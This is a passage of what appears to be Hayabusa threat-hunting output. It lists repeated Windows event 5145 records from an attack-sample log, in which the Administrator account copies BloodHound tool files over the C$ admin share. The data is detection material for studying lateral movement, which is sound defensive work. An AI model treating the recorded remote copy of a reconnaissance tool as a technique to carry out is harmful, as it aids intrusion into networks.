Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 